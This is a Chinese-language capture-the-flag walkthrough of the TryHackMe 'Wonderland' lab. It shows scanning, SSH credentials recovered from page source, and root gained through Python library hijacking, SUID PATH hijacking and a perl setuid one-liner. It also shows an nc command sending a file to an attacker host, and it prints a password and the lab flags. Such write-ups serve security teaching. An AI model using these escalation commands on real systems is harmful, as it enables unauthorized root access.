知识点
1.目录深入扫描得到ssh凭证
2.库挟持提权
3.suid $PATH挟持二进制文件提权
4. Capabilities
信息搜集
>>>端口扫描
nmap 10.10.159.1Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-31 14:36 CSTNmap scan report for 10.10.159.1Host is up (0.39s latency).Not shown: 998 closed tcp ports (reset)PORT STATE SERVICEopen sshopen httpNmap done: 1 IP address (1 host up) scanned in 8.88 secondsnmap 10.10.159.1 -T5 -A -OStarting Nmap 7.94 ( https://nmap.org ) at 2024-03-31 14:37 CSTNmap scan report for 10.10.159.1Host is up (0.23s latency).Not shown: 998 closed tcp ports (reset)PORT STATE SERVICE VERSIONopen ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)ssh-hostkey:2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API): Follow the white rabbit.Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (92%), Linux 2.6.32Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.11 (92%)No exact OS matches for host (test conditions non-ideal).Network Distance: 4 hopsService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE (using port 80/tcp)HOP RTT ADDRESS1 411.22 ms 10.2.0.12 ... 34 411.43 ms 10.10.159.1OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 43.05 seconds
>>>目录扫描
└─# ffuf -w /usr/share/wordlists/dirb/common.txt -u "http://10.10.159.1/FUZZ" -fs 1341/'___ /'___ /'___/ __/ / __/ __ __ / __/,__\ ,__/ / ,___/ _/ _ _/_ _ ____/ _/_/ /_/ /___/ /_/v2.1.0-dev________________________________________________:: Method : GET:: URL : http://10.10.159.1/FUZZ:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt:: Follow redirects : false:: Calibration : false:: Timeout : 10:: Threads : 40:: Matcher : Response status: 200-299,301,302,307,401,403,405,500:: Filter : Response size: 1341________________________________________________[Status: 200, Size: 402, Words: 55, Lines: 10, Duration: 395ms]img [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 429ms]index.html [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 322ms]r [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 347ms]
发现r目录,继续
└─# ffuf -w /usr/share/wordlists/dirb/common.txt -u "http://10.10.159.1/r/a/b/FUZZ" -fs 1341/'___ /'___ /'___/ __/ / __/ __ __ / __/,__\ ,__/ / ,___/ _/ _ _/_ _ ____/ _/_/ /_/ /___/ /_/v2.1.0-dev________________________________________________:: Method : GET:: URL : http://10.10.159.1/r/a/b/FUZZ:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt:: Follow redirects : false:: Calibration : false:: Timeout : 10:: Threads : 40:: Matcher : Response status: 200-299,301,302,307,401,403,405,500:: Filter : Response size: 1341________________________________________________[Status: 200, Size: 237, Words: 31, Lines: 9, Duration: 505ms]b [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 370ms][WARN] Caught keyboard interrupt (Ctrl-C)
通过fuzz最终发现该网页:http://10.10.159.1/r/a/b/b/i/t/,查看源码发现ssh凭证
提权
>>>库挟持
alice@wonderland:~$ sudo -lMatching Defaults entries for alice on wonderland:env_reset, mail_badpass,secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binUser alice may run the following commands on wonderland:(rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.pyalice@wonderland:~$ cat walrus_and_the_carpenter.pyimport randompoem = """The sun was shining on the sea,Shining with all his might:He did his very best to makeThe billows smooth and bright —And this was odd, because it wasThe middle of the night.The moon was shining sulkily,Because she thought the sunHad got no business to be thereAfter the day was done —"It’s very rude of him," she said,"To come and spoil the fun!"The sea was wet as wet could be,The sands were dry as dry.You could not see a cloud, becauseNo cloud was in the sky:No birds were flying over head —There were no birds to fly.The Walrus and the CarpenterWere walking close at hand;They wept like anything to seeSuch quantities of sand:"If this were only cleared away,"They said, "it would be grand!""If seven maids with seven mopsSwept it for half a year,Do you suppose," the Walrus said,"That they could get it clear?""I doubt it," said the Carpenter,And shed a bitter tear."O Oysters, come and walk with us!"The Walrus did beseech."A pleasant walk, a pleasant talk,Along the briny beach:We cannot do with more than four,To give a hand to each."The eldest Oyster looked at him.But never a word he said:The eldest Oyster winked his eye,And shook his heavy head —Meaning to say he did not chooseTo leave the oyster-bed.But four young oysters hurried up,All eager for the treat:Their coats were brushed, their faces washed,Their shoes were clean and neat —And this was odd, because, you know,They hadn’t any feet.Four other Oysters followed them,And yet another four;And thick and fast they came at last,And more, and more, and more —All hopping through the frothy waves,And scrambling to the shore.The Walrus and the CarpenterWalked on a mile or so,And then they rested on a rockConveniently low:And all the little Oysters stoodAnd waited in a row."The time has come," the Walrus said,"To talk of many things:Of shoes — and ships — and sealing-wax —Of cabbages — and kings —And why the sea is boiling hot —And whether pigs have wings.""But wait a bit," the Oysters cried,"Before we have our chat;For some of us are out of breath,And all of us are fat!""No hurry!" said the Carpenter.They thanked him much for that."A loaf of bread," the Walrus said,"Is what we chiefly need:Pepper and vinegar besidesAre very good indeed —Now if you’re ready Oysters dear,We can begin to feed.""But not on us!" the Oysters cried,Turning a little blue,"After such kindness, that would beA dismal thing to do!""The night is fine," the Walrus said"Do you admire the view?"It was so kind of you to come!And you are very nice!"The Carpenter said nothing but"Cut us another slice:I wish you were not quite so deaf —I’ve had to ask you twice!""It seems a shame," the Walrus said,"To play them such a trick,After we’ve brought them out so far,And made them trot so quick!"The Carpenter said nothing but"The butter’s spread too thick!""I weep for you," the Walrus said."I deeply sympathize."With sobs and tears he sorted outThose of the largest size.Holding his pocket handkerchiefBefore his streaming eyes."O Oysters," said the Carpenter."You’ve had a pleasant run!Shall we be trotting home again?"But answer came there none —And that was scarcely odd, becauseThey’d eaten every one."""for i in range(10):line = random.choice(poem.split("n"))print("The line was:t", line)
随机歌词的脚本,可用rabbit用户执行该文件,调用了random的库
python3 -c 'import sys; print (sys.path)'['', '/usr/lib/python36.zip', '/usr/lib/python3.6', '/usr/lib/python3.6/lib-dynload', '/usr/local/lib/python3.6/dist-packages', '/usr/lib/python3/dist-packages']
查看库调用的位置,库调用首先调用本目录 可在本目录写入random.py库
:~$ cat random.pyimport osos.system("/bin/bash")sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.pyiduid=1002(rabbit) gid=1002(rabbit) groups=1002(rabbit)
成功获取rabbit用户权限
>>>suid $PATH挟持二进制文件提权
rabbit@wonderland:/home/rabbit$ ls -latotal 40drwxr-x--- 2 rabbit rabbit 4096 May 25 2020 .drwxr-xr-x 6 root root 4096 May 25 2020 ..lrwxrwxrwx 1 root root 9 May 25 2020 .bash_history -> /dev/null-rw-r--r-- 1 rabbit rabbit 220 May 25 2020 .bash_logout-rw-r--r-- 1 rabbit rabbit 3771 May 25 2020 .bashrc-rw-r--r-- 1 rabbit rabbit 807 May 25 2020 .profile-rwsr-sr-x 1 root root 16816 May 25 2020 teaParty
发现teaparty文件具有suid权限
rabbit@wonderland:/home/rabbit$ nc 10.2.11.235 6666 < teaParty└─# nc -nlvp 6666>teaParty传到kali对二进制位文件进行分析
strings teaPartysetuidputsgetcharsystem__cxa_finalizesetgid__libc_start_main_ITM_deregisterTMCloneTable__gmon_start___ITM_registerTMCloneTableWelcome to the tea party!The Mad Hatter will be here soon.-n 'Probably by ' && date --date='next hour' -RAsk very nicely, and I will give you some tea while you wait for himSegmentation fault (core dumped)GCC: (Debian 8.3.0-6) 8.3.0deregister_tm_clones__do_global_dtors_aux__do_global_dtors_aux_fini_array_entryframe_dummy__frame_dummy_init_array_entry__FRAME_END____init_array_end_DYNAMIC__init_array_start__GNU_EH_FRAME_HDR_GLOBAL_OFFSET_TABLE___libc_csu_fini_ITM_deregisterTMCloneTable_edata__data_start__gmon_start____dso_handle_IO_stdin_used__libc_csu_init__bss_startmain__TMC_END___ITM_registerTMCloneTable.comment
调用/bin/echo date命令,可用$PATH提权
rabbit@wonderland:/home/rabbit$ echo $PATH/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binrabbit@wonderland:/home/rabbit$ export PATH=/tmp:$PATHrabbit@wonderland:/home/rabbit$ echo $PATH/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
将tmp添加到$PATH中 调用二进制程序时 会按照顺序依次查找环境变量路径;我们可在tmp写入恶意脚本 添加tmp到环境变量 顺序在/bin之前 就会调用我们的恶意脚本
chmod 777 daterabbit@wonderland:/home/rabbit$ ./teaPartyWelcome to the tea party!The Mad Hatter will be here soon.Probably by hatter@wonderland:/home/rabbit$
获取了hatter的权限
hatter@wonderland:/home/hatter$ lspassword.txthatter@wonderland:/home/hatter$ cat password.txtWhyIsARavenLikeAWritingDesk?
在hatter目录发现密码,尝试过后确认为hatter密码,获取root权限
>>>Capabilities提权
hatter@wonderland:~$ getcap -r / 2>/dev/null/usr/bin/perl5.26.1 = cap_setuid+ep/usr/bin/mtr-packet = cap_net_raw+ep/usr/bin/perl = cap_setuid+ephatter@wonderland:~$ perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'# iduid=0(root) gid=1003(hatter) groups=1003(hatter)#
获取root权限
cd ../../rootlsuser.txtcat user.txtthm{"Curiouser and curiouser!"}pwd/rootcd /homelsalice hatter rabbit tryhackmecd alicelsroot.txt walrus_and_the_carpenter.pycat root.txtthm{Twinkle, twinkle, little bat! How I wonder what you’re at!}
原文始发于微信公众号(ZeroPointZero安全团队):THM靶机学习-Wonderland
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论